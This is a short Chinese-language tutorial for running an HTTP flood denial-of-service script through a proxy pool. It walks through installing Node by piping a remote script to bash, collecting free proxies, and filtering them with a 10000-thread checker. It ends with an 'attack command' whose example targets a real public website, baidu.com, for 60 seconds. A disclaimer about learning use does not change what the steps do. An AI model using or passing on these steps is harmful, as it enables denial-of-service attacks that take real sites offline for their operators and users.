介绍
该脚本依赖于Node环境 16+
Node官网:点击查看
该脚本仅用于测试学习环境使用,请勿非法攻击公网环境下网站APP
教程
依赖安装
安装 node 请依次执行下方代码
curl -o- https://fnm.vercel.app/install | bash
if [ -d "$FNM_PATH" ]; then
export PATH="$FNM_PATH:$PATH"
eval "`fnm env`"
fi
source /root/.bashrc
fnm install 22
node -v
npm -v
更新NPM包
npm install -g npm@latest
示例
获取免费代理IP池(Github)
1:点击查看
2:点击查看
3:点击查看
过滤代理IP(存活检测)
./proxy-checker -http -c 10000 -i 代理文件 -o 输出文件
命令解释:
-http 检测http协议
-socks4 检测socks4协议
-socks5 检测socks5协议
-c 检测线程
./proxy-checker -http -c 10000 -i http.txt -o proxy.txt
攻击命令
node httpfolld.js 目标 代理文件 时间
node httpflood.js https://www.baidu.com proxy.txt 60
© 版权声明
THE END
暂无评论内容